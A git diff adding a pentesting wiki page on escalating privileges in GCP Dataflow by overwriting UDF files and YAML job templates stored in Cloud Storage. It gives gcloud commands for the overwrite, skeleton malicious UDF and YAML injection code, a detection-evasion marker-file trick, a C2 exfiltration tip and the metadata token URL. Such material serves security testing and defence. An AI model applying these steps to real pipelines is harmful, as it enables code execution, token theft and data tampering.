|
| 1 | +# GCP - Dataflow Privilege Escalation |
| 2 | + |
| 3 | +{{#include ../../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +## Dataflow |
| 6 | + |
| 7 | +{{#ref}} |
| 8 | +../gcp-services/gcp-dataflow-enum.md |
| 9 | +{{#endref}} |
| 10 | + |
| 11 | +### `storage.objects.create`, `storage.objects.get`, `storage.objects.update` |
| 12 | + |
| 13 | +Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. |
| 14 | +With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing. |
| 15 | +Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling). |
| 16 | + |
| 17 | +**Attack vectors:** |
| 18 | +- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets |
| 19 | +- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets |
| 20 | + |
| 21 | + |
| 22 | +> [!WARNING] |
| 23 | +> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line. |
| 24 | +
|
| 25 | + |
| 26 | +#### Direct exploitation via gcloud CLI |
| 27 | + |
| 28 | +1. Enumerate Dataflow jobs and locate the template/UDF GCS paths: |
| 29 | + |
| 30 | +<details> |
| 31 | + |
| 32 | +<summary>List jobs and describe to get template path, staging location, and UDF references</summary> |
| 33 | + |
| 34 | +```bash |
| 35 | +# List jobs (optionally filter by region) |
| 36 | +gcloud dataflow jobs list --region=<region> |
| 37 | +gcloud dataflow jobs list --project=<PROJECT_ID> |
| 38 | + |
| 39 | +# Describe a job to get template GCS path, staging location, and any UDF/template references |
| 40 | +gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml" |
| 41 | +# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH) |
| 42 | +# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath |
| 43 | +``` |
| 44 | + |
| 45 | +</details> |
| 46 | + |
| 47 | +2. Download the original UDF or job template from GCS: |
| 48 | + |
| 49 | +<details> |
| 50 | + |
| 51 | +<summary>Download UDF file or YAML template from bucket</summary> |
| 52 | + |
| 53 | +```bash |
| 54 | +# If job references a UDF at gs://bucket/path/to/udf.py |
| 55 | +gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py |
| 56 | + |
| 57 | +# Or for a YAML job template |
| 58 | +gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml |
| 59 | +``` |
| 60 | + |
| 61 | +</details> |
| 62 | + |
| 63 | +3. Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used. |
| 64 | + |
| 65 | +4. Re-upload to overwrite the original file: |
| 66 | + |
| 67 | +<details> |
| 68 | + |
| 69 | +<summary>Overwrite UDF or template in bucket</summary> |
| 70 | + |
| 71 | +```bash |
| 72 | +gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py |
| 73 | + |
| 74 | +# Or for YAML |
| 75 | +gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml |
| 76 | +``` |
| 77 | + |
| 78 | +</details> |
| 79 | + |
| 80 | +5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file. |
| 81 | + |
| 82 | +#### Python UDF injection |
| 83 | + |
| 84 | +If you want to have a the worker exfiltrate data to your C2 server use `urllib.request` and not `requests`. |
| 85 | +`requests` is not preinstalled on classic Dataflow workers. |
| 86 | + |
| 87 | +<details> |
| 88 | + |
| 89 | +<summary>Malicious UDF with run-once coordination and metadata extraction</summary> |
| 90 | + |
| 91 | +```python |
| 92 | +import os |
| 93 | +import json |
| 94 | +import urllib.request |
| 95 | +from datetime import datetime |
| 96 | + |
| 97 | +def _malicious_func(): |
| 98 | + # File-based coordination: run once per worker. |
| 99 | + coordination_file = "/tmp/pwnd.txt" |
| 100 | + if os.path.exists(coordination_file): |
| 101 | + return |
| 102 | + |
| 103 | + # malicous code goes here |
| 104 | + with open(coordination_file, "w", encoding="utf-8") as f: |
| 105 | + f.write("done") |
| 106 | + |
| 107 | +def transform(line): |
| 108 | + # Malicous code entry point - runs per line but coordination ensures once per worker |
| 109 | + try: |
| 110 | + _malicious_func() |
| 111 | + except Exception: |
| 112 | + pass |
| 113 | + # ... original UDF logic follows ... |
| 114 | +``` |
| 115 | + |
| 116 | +</details> |
| 117 | + |
| 118 | + |
| 119 | +#### Job template YAML injection |
| 120 | + |
| 121 | +Inject a `MapToFields` step with a callable that uses a coordination file. For YAML-based pipelines that support `requests`, use it if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`. |
| 122 | + |
| 123 | +Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination. |
| 124 | + |
| 125 | +<details> |
| 126 | + |
| 127 | +<summary>Malicious MapToFields step and cleanup in pipeline YAML</summary> |
| 128 | + |
| 129 | + |
| 130 | +```yaml |
| 131 | +- name: MaliciousTransform |
| 132 | + type: MapToFields |
| 133 | + input: Transform |
| 134 | + config: |
| 135 | + language: python |
| 136 | + fields: |
| 137 | + malicious_step: |
| 138 | + callable: | |
| 139 | + def extract_and_return(row): |
| 140 | + import os |
| 141 | + import json |
| 142 | + from datetime import datetime |
| 143 | + coordination_file = "/tmp/pwnd.txt" |
| 144 | + if os.path.exists(coordination_file): |
| 145 | + return True |
| 146 | + try: |
| 147 | + import urllib.request |
| 148 | + # malicious code goes here |
| 149 | + with open(coordination_file, "w", encoding="utf-8") as f: |
| 150 | + f.write("done") |
| 151 | + except Exception: |
| 152 | + pass |
| 153 | + return True |
| 154 | + append: true |
| 155 | +- name: CleanupTransform |
| 156 | + type: MapToFields |
| 157 | + input: MaliciousTransform |
| 158 | + config: |
| 159 | + fields: {} |
| 160 | + append: true |
| 161 | + drop: |
| 162 | + - malicious_step |
| 163 | +``` |
| 164 | +
|
| 165 | +</details> |
| 166 | +
|
| 167 | +### Compute Engine access to Dataflow Workers |
| 168 | +
|
| 169 | +**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection |
| 170 | + |
| 171 | +Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code. |
| 172 | + |
| 173 | +For exploitation details, see: |
| 174 | +- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata` |
| 175 | + |
| 176 | +## References |
| 177 | + |
| 178 | +- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider) |
| 179 | +- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions) |
| 180 | +- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe) |
| 181 | +- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/) |
| 182 | +- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/) |
| 183 | + |
| 184 | +{{#include ../../../banners/hacktricks-training.md}} |
0 commit comments